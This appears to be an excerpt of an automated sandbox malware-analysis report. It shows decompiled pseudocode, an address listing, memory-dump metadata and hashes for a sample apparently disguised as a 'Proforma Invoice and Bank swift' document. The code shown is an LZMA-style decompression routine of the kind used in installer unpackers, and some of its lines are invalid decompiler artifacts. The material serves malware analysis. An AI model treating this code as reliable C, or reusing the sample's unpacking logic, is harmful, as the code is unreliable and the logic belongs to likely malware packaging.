												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406767
0x00406767
0x0040676b
0x00406790
0x0040679a
0x00000000
0x0040676d
0x0040676d
0x00406770
0x00406774
0x00406777
0x0040677a
0x0040677e
0x0040677e
0x00406781
0x0040685b
0x0040685b
0x00406862
0x00406862
0x00406865
0x0040686c
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00406428
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x00000000
0x00000000
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x00000000
0x00406854
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x00000000
0x00000000
0x00406915
0x00406918
0x00406819
0x00406819
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00000000
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x004069b7
0x004069bd
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x004068f6
0x00000000
0x0040676b

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
